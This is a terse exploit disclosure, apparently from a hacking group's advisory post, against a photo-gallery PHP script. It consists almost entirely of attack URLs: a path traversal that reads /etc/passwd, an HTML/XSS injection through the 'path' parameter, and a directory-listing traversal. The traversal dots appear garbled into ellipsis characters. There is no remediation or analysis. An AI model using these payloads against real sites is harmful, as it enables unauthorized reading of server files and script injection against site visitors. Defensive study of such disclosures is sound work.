vendor:
http://www.jakeo.com
vuln :
http://[host]/foto/index.php?path=…/…/etc/passwd
http://[host]/foto/index.php?path=<b>xss</b>
http://[host]/foto/index.php?path=…/…/[directory listing]
Author : Vampire
Homepage : Www.HackerZ.iR
Iran HackerZ Security Team